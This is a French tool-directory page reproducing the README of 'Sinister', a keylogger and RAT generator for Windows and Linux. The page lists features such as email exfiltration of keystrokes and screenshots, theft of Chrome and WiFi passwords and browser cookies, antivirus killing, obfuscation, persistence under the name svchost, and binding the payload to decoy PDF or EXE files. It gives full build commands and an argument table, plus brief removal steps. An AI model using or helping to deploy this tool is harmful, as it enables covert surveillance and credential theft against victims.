Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Sinister — Sinister est un générateur de keyloggers pour Windows/Linux qui envoie les frappes clavier par e-mail avec d'autres informations juteuses sur la cible. | Kitploit
Outils/GitHubGitHub/pushpenderindia/sinister
Cassage de Mots de PasseGénération de PayloadsMécanismes de PersistanceExfiltration de DonnéesCollecte d'InformationsPost-ExploitationRed TeamingOutil d'Accès à Distance
GitHubpushpenderindia/sinister

Sinister

Sinister est un générateur de keyloggers pour Windows/Linux qui envoie les frappes clavier par e-mail avec d'autres informations juteuses sur la cible.

Voir le dépôt
46593il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Logo Sinister

Sinister

GIF Hacker

root@kitploit:~
                    Ce petit script Python peut faire un travail vraiment impressionnant.

Sinister est un générateur de keylogger pour Windows/Linux, qui envoie les frappes clavier et les captures d'écran par e-mail, avec d'autres informations juteuses sur la cible, écrit en Python 3.

Avertissement

:computer: Ce projet a été créé uniquement à des fins louables et pour un usage personnel.

CE LOGICIEL EST FOURNI « EN L'ÉTAT » SANS GARANTIE D'AUCUNE SORTE. VOUS POUVEZ UTILISER CE LOGICIEL À VOS PROPRES RISQUES. L'UTILISATION EST DE LA SEULE RESPONSABILITÉ DE L'UTILISATEUR FINAL. LES DÉVELOPPEURS N'ASSUMENT AUCUNE RESPONSABILITÉ ET NE SONT PAS RESPONSABLES DE TOUTE MAUVAISE UTILISATION OU DE TOUT DOMMAGE CAUSÉ PAR CE PROGRAMME.

Fonctionnalités

  • Fonctionne sur Windows/Linux
  • Notifier une nouvelle victime par e-mail
  • Indétectable
  • Persistance
  • Validation des identifiants e-mail avant la génération de la charge utile.
  • Peut recevoir les frappes clavier via n'importe quel fournisseur de messagerie tel que GMAIL, YAHOO, OUTLOOK, SMTP personnalisé.
  • Serveur/Port SMTP
Nom du serveurServeur SMTPPort SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Envoie une capture d'écran de l'écran du PC de la victime par e-mail
  • Crée un binaire exécutable sans aucune dépendance
  • Crée une charge utile de petite taille (~5 Mo) avec des fonctionnalités avancées
  • Obfusque la charge utile avant de la générer, contournant ainsi quelques antivirus supplémentaires
  • La charge utile générée est encodée en base64, rendant l'ingénierie inverse extrêmement difficile
  • Fonction pour tuer l'antivirus sur le PC de la victime et tenter de désactiver la sécurité
  • Interface colorée impressionnante pour générer la charge utile
  • Côté attaquant : lors de la création de la charge utile, le script détecte automatiquement les dépendances manquantes et les installe
  • Distingue les données de journal en fonction du nom de la fenêtre active (Voir l'image pour mieux comprendre)
  • Possibilité d'ajouter une icône personnalisée au fichier malveillant
  • Lieutenant intégré qui peut lier le keylogger à n'importe quel fichier [.pdf, .txt, .exe, etc.], exécutant le fichier légitime au premier plan et les codes malveillants en arrière-plan en tant que service.
  • Vérifie la sur le système : si une instance en cours est trouvée, seul le fichier légitime est exécuté [ pour éviter de recevoir des journaux en double par e-mail].
Le voleur intégré peut voler ces éléments :
Navigateur Chrome (mots de passe enregistrés)
WiFi (mots de passe enregistrés)
Cookies Chrome (données de connexion, cookies, historique)
Cookies Firefox (cookies.sqlite)

Remarque : le voleur personnalisé est codé, ne repose pas sur LaZagne

  • Récupère et envoie des informations utiles sur l'appareil de la victime
Ces éléments sont récupérés et envoyés :
Système d'exploitation
Nom de l'ordinateur
Nom d'utilisateur
IPv4 publique
  • Si votre charge utile ne parvient pas à s'exécuter, utilisez --debug pour exécuter l'exe en avant-plan avec CMD

Important

Le 30 mai 2022, Google a supprimé la fonctionnalité des applications moins sécurisées, donc au lieu du mot de passe Gmail :

  • Activez l'authentification à deux facteurs (2FA) sur votre Gmail attaquant
  • Créez un mot de passe d'application spécifique
  • Utilisez ce mot de passe d'application spécifique lors de la création de la charge utile.
  • Comment créer un mot de passe d'application spécifique : Cliquez ici

Testé sur

Kali) Kali Linux - ÉDITION ROULANTE

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prérequis

  • Python 3.X
  • Quelques modules externes

Comment utiliser sous Linux

root@kitploit:~
# Naviguez vers le répertoire /opt (optionnel)
$ cd /opt/

# Clonez ce dépôt
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Déplacez-vous dans le dossier Sinister
$ cd Sinister

# Installez les dépendances
$ bash installer_linux.sh

*** Remarque : lorsque la boîte de dialogue de l'installateur Python apparaît lors de l'exécution de installer_linux.sh ***
    * Cliquez sur installation personnalisée
    * Choisissez le chemin vers : C:/Python37-32
    ### Pour que Python soit installé dans ce chemin (sous Wine) : ~/.wine/drive_c/Python37-32

# Si vous rencontrez des erreurs lors de l'exécution de installer_linux.sh, essayez d'installer avec installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Création de la charge utile/RAT
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP GMAIL, configuration du port (serveur SMTP par défaut = smtp.gmail.com, port SMTP par défaut = 587)
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP OUTLOOK, configuration du port
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -x smtp-mail.outlook.com -y 587 -l -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP YAHOO, configuration du port
$ python3 Sinister.py -e [email protected] -p VotreMotDePasse -x smtp.mail.yahoo.com -y 587 -l -o nom_fichier_sortie --icon chemin_icone

Remarque : Vous pouvez également utiliser nos icônes personnalisées depuis le dossier icon, utilisez-les ainsi : --icon icon/pdf.ico

Comment utiliser sous Windows

root@kitploit:~
# Installez les dépendances
$ Installez la dernière version de Python 3.x

# Clonez ce dépôt
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Allez dans le dépôt
$ cd Sinister

# Installez les dépendances
$ python -m pip install -r requirements.txt

# Ouvrez Sinister.py dans un éditeur de texte et configurez la ligne 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Obtenez le menu d'aide
$ python Sinister.py --help

# Création de la charge utile/RAT
$ python Sinister.py -e [email protected] -p VotreMotDePasse -w -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP GMAIL, configuration du port (serveur SMTP par défaut = smtp.gmail.com, port SMTP par défaut = 587)
$ python Sinister.py -e [email protected] -p VotreMotDePasse -w -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP OUTLOOK, configuration du port
$ python Sinister.py -e [email protected] -p VotreMotDePasse -x smtp-mail.outlook.com -y 587 -w -o nom_fichier_sortie --icon chemin_icone

# Création de la charge utile en utilisant le serveur SMTP YAHOO, configuration du port
$ python Sinister.py -e [email protected] -p VotreMotDePasse -x smtp.mail.yahoo.com -y 587 -w -o nom_fichier_sortie --icon chemin_icone

Remarque : Vous pouvez également utiliser nos icônes personnalisées depuis le dossier icon, utilisez-les ainsi : --icon icon/pdf.ico

Comment mettre à jour

  • Exécutez updater.py pour mettre à jour automatiquement ou téléchargez la dernière archive zip depuis ce dépôt GitHub.
  • Remarque : Git doit être installé pour utiliser updater.py.

Remarque : Le fichier malveillant sera sauvegardé dans le dossier dist/, à l'intérieur du dossier Sinister/

Arguments disponibles

  • Arguments optionnels

Remarque : Soit -w/--windows soit -l/--linux doit être spécifié.

  • Arguments obligatoires

Nouvelles captures d'écran :

Obtenir de l'aide

Génération de la charge utile

Réception du rapport

Les données du journal sont distinguées en fonction du nom de la fenêtre active ~ Fonctionnalité ajoutée à la v1.3 et suivantes

Récupère et envoie les mots de passe enregistrés du navigateur Chrome

  • Remarque : Pour utiliser cette fonctionnalité, spécifiez -s ou --steal-password lors de la création du keylogger.

Récupère et envoie les mots de passe WiFi enregistrés

  • Remarque : Pour utiliser cette fonctionnalité, spécifiez -s ou --steal-password lors de la création du keylogger.

Consultez également ces anciennes images

~Anciennes captures d'écran :

Obtenir de l'aide

Exécution du script Sinister.py

Construction terminée

Lorsque le keylogger s'exécute, il ajoute une entrée de registre pour devenir persistant

Fait une copie de lui-même et la sauvegarde dans Roaming

Saisie de texte aléatoire pour tester le keylogger

Rapport 1 envoyé par Sinister

Connexion Facebook ~ Victime

Rapport 2 - Frappes clavier des identifiants Facebook

Rapport 3 - Avec captures d'écran

Problèmes de débogage

Essayez d'exécuter le keylogger hors ligne pour tester la capture des frappes clavier hors ligne et déboguer les problèmes du keylogger en exécutant ces commandes :

Exécutez test_key.py dans les deux modes [Compilé et brut] et déterminez l'erreur.

Exécutez-le comme ceci : python test_key.py

Compilez-le également comme ceci : pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

Après l'avoir exécuté, commencez à taper quelque chose, Le résultat s'affichera dans l'invite de commande toutes les 10 secondes.

Les fichiers du keylogger hors ligne se trouvent dans le dossier TestKeylogger

  • Si la charge utile ne peut pas s'exécuter sur le système de la victime
root@kitploit:~
1. Créez une nouvelle charge utile avec le drapeau --debug
2. Exécutez l'exe de la charge utile via cmd [N'exécutez pas la charge utile en double-cliquant dessus]
3. Cela donnera une erreur plus appropriée dans CMD, veuillez soumettre ce problème dans la section Issues

Supprimer Sinister sous Windows :

Méthode 1 :

  • Allez dans Démarrer, tapez regedit et exécutez le premier programme, cela ouvrira l'éditeur de registre.
  • Naviguez jusqu'au chemin suivant Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Il devrait y avoir une entrée nommée svchost, faites un clic droit sur cette entrée et sélectionnez Supprimer.
  • Allez dans votre chemin utilisateur > AppData > Roaming, vous verrez un fichier nommé "svchost.exe", c'est le RAT, faites un clic droit > Supprimer.
  • Redémarrez le système.

Méthode 2 :

  • Exécutez "RemoveSinister.bat" sur le système infecté, puis redémarrez le PC pour arrêter le fichier malveillant actuellement en cours d'exécution.

Supprimer Sinister sous Linux :

  • Ouvrez le fichier de démarrage automatique avec un éditeur de texte, Chemin du fichier de démarrage automatique : ~/.config/autostart/xinput.desktop

  • Supprimez ces 5 lignes :

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="nom_fichier_destination"
    
  • Remarque : nom_fichier_destination est le nom que vous avez donné à votre keylogger avec le paramètre -o

  • Redémarrez votre système, puis supprimez le fichier malveillant stocké sous ce chemin ci-dessous

  • Chemin de destination où le keylogger est stocké : ~/.config/xnput

Contributeurs

  • Liste dédiée des contributeurs : Contributeurs

Les contributions de toute nature sont les bienvenues !

REMARQUE : Si vous devriez figurer sur la liste des contributeurs mais que nous vous avons oublié, veuillez nous le faire savoir !

À FAIRE

  • Suggérez votre propre fonctionnalité
  • Ajoutez de nouvelles fonctionnalités
  • Contribuez à la version GUI
Télécharger l’outil
présence d'une instance déjà en cours
Interdiction d'instances multiples
  • L'attaquant peut créer/compiler pour les deux systèmes d'exploitation Windows/Linux en utilisant un système Linux, mais ne peut créer/compiler que des exécutables Windows avec une machine Windows.
  • Récupère les mots de passe enregistrés du système victime et les envoie à l'attaquant.
  • AbréviationNom completDescription
    -h--helpAffiche ce message d'aide et quitte.
    -i INTERVAL--interval INTERVALTemps entre les rapports en secondes. défaut=120
    -t TIME_PERSISTENT--persistence TIME_PERSISTENTDevenir persistant après __ secondes. défaut=10
    -x SMTP_Server--smtpServeur SMTP personnalisé. défaut="smtp.gmail.com"
    -y SMTP_Port--portPort SMTP personnalisé. défaut=587
    -w--windowsGénère un exécutable Windows.
    -l--linuxGénère un exécutable Linux.
    -s--steal-passwordVole les mots de passe enregistrés de la machine victime [Système d'exploitation pris en charge : Windows]
    -b fichier.txt--bind CHEMIN_FICHIER_LEGITIME.pdfAutoLieutenant : spécifiez le chemin du fichier légitime. [Système d'exploitation pris en charge : Windows]
    -d--debugLa charge utile s'exécutera en avant-plan avec une fenêtre CMD pour obtenir des erreurs d'exécution appropriées.
    AbréviationNom completDescription
    --icon ICONSpécifiez le chemin de l'icône, icône du fichier malveillant [Remarque : doit être .ico]
    -e EMAIL--email EMAILAdresse e-mail pour envoyer les rapports.
    -p PASSWORD--password PASSWORDMot de passe pour l'adresse e-mail donnée dans l'argument -e.
    -o OUT--out OUTNom du fichier de sortie.

    Pushpender Singh

    :computer:

    Thomas Kunwar

    :computer:

    krasnova19

    :computer:

    sarchish5

    :computer:

    chiragcode11

    :computer:

    C4RR0T02

    :computer: